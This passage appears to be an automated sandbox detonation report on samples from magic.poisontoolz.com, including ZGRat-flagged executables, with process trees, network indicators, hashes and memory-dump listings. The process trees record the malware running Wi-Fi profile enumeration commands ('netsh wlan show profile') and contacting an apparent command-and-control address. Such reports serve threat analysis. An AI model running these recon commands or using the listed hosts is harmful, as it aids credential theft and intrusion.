memory/1468-7327-0x00007FFE09850000-0x00007FFE0A311000-memory.dmp
memory/4404-7328-0x0000000074B00000-0x00000000752B0000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
153s
Max time network
160s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\RIB.pdf"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=FF7CE518D4EC21B0743587B82E6ECC8E --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7D6AC1F5870E0F078293E6A6E0CDAEF5 --renderer-client-id=2 --mojo-platform-channel-handle=1808 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F920421836A4D80FFB4795834086BD86 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=169BB5BAB9F9F7C182E71310ACE2C663 --mojo-platform-channel-handle=2412 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=94AD9E1E45E47E153EA99DEFD214CF1C --mojo-platform-channel-handle=2420 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=CC4D037BE538E059872178F8193148FF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=CC4D037BE538E059872178F8193148FF --renderer-client-id=8 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=236DD7BCEA487CAEDD45801581597C13 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=236DD7BCEA487CAEDD45801581597C13 --renderer-client-id=10 --mojo-platform-channel-handle=2684 --allow-no-sandbox-job /prefetch:1
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | N/A | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.37.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.98.74.40.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | b30d3becc8731792523d599d949e63f5 |
| SHA1 | 19350257e42d7aee17fb3bf139a9d3adb330fad4 |
| SHA256 | b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3 |
| SHA512 | 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e |
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | 752a1f26b18748311b691c7d8fc20633 |
| SHA1 | c1f8e83eebc1cc1e9b88c773338eb09ff82ab862 |
| SHA256 | 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131 |
| SHA512 | a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5 |
memory/3916-28-0x0000000009770000-0x0000000009791000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
| MD5 | e5b1404a25894361f2981fd4d9b1fa01 |
| SHA1 | a5bd0a94f2bfab6b10dcc61280747e98dcb1448b |
| SHA256 | 02ac40ae1bba053d949c71fb2849105424a2db85b00a5029eb43c5c18d963724 |
| SHA512 | 84dcc3f6b2791d4c86948308151d9708c00fd84dea42fe27a05fab83bd30a21965c652fa9cb607013867d325a952aea67297bf9f8086403e9ebdd7c3d12a0fff |
memory/3916-133-0x0000000009770000-0x0000000009791000-memory.dmp
memory/3916-135-0x000000000A300000-0x000000000A44D000-memory.dmp
memory/3916-143-0x000000000A300000-0x000000000A44D000-memory.dmp
memory/3916-146-0x000000000A590000-0x000000000A5BA000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
144s
Max time network
151s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3580 set thread context of 1596 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Walter.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 138.91.171.81:80 | N/A | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| NL | 38.170.242.108:7785 | N/A | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
Files
memory/3580-0-0x0000020FBB5C0000-0x0000020FBB728000-memory.dmp
memory/3580-2-0x00007FF813890000-0x00007FF814351000-memory.dmp
memory/3580-3-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-4-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-8-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-14-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-24-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-32-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-38-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-40-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-46-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-52-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-56-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-64-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-66-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-62-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-60-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-58-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-54-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-50-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-48-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-44-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-42-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-36-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-34-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-30-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-28-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-26-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-22-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-20-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-18-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-16-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-12-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-10-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-6-0x0000020FD5C80000-0x0000020FD5DDB000-memory.dmp
memory/3580-1-0x0000020FD5C80000-0x0000020FD5DE2000-memory.dmp
memory/3580-936-0x0000020FBD3A0000-0x0000020FBD3A1000-memory.dmp
memory/3580-935-0x0000020FD5C70000-0x0000020FD5C80000-memory.dmp
memory/3580-938-0x0000020FD5DE0000-0x0000020FD5E2C000-memory.dmp
memory/3580-937-0x0000020FD5B30000-0x0000020FD5C28000-memory.dmp
memory/1596-942-0x0000000140000000-0x00000001400D0000-memory.dmp
memory/1596-945-0x000001E14EE80000-0x000001E14EF8A000-memory.dmp
memory/1596-944-0x00007FF813890000-0x00007FF814351000-memory.dmp
memory/3580-943-0x00007FF813890000-0x00007FF814351000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Walter.exe.log
| MD5 | 9f5d0107d96d176b1ffcd5c7e7a42dc9 |
| SHA1 | de83788e2f18629555c42a3e6fada12f70457141 |
| SHA256 | d0630b8466cebaaf92533826f6547b6f36a3c480848dc38d650acd52b522a097 |
| SHA512 | 86cfaa3327b59a976ddd4a5915f3fe8c938481344fcbd10e7533b4c5003673d078756e62435940471658a03504c3bc30603204d6a133727a3f36c96d08714c61 |
memory/1596-3162-0x000001E14F030000-0x000001E14F0CE000-memory.dmp
memory/1596-3163-0x00007FF813890000-0x00007FF814351000-memory.dmp
memory/1596-3164-0x000001E14F020000-0x000001E14F030000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
16s
Max time network
152s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
ZGRat
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4824 set thread context of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe
"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe"
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe
C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\building.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 172.67.162.192:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 192.162.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| GB | 96.17.179.12:80 | | tcp |
Files
memory/4824-0-0x00000000009D0000-0x00000000009E4000-memory.dmp
memory/4824-1-0x0000000074FF0000-0x00000000757A0000-memory.dmp
memory/4824-2-0x0000000005550000-0x0000000005560000-memory.dmp
memory/4824-3-0x0000000002EA0000-0x0000000002EA6000-memory.dmp
memory/4824-4-0x0000000006E90000-0x000000000709A000-memory.dmp
memory/4824-5-0x0000000006E90000-0x0000000007095000-memory.dmp
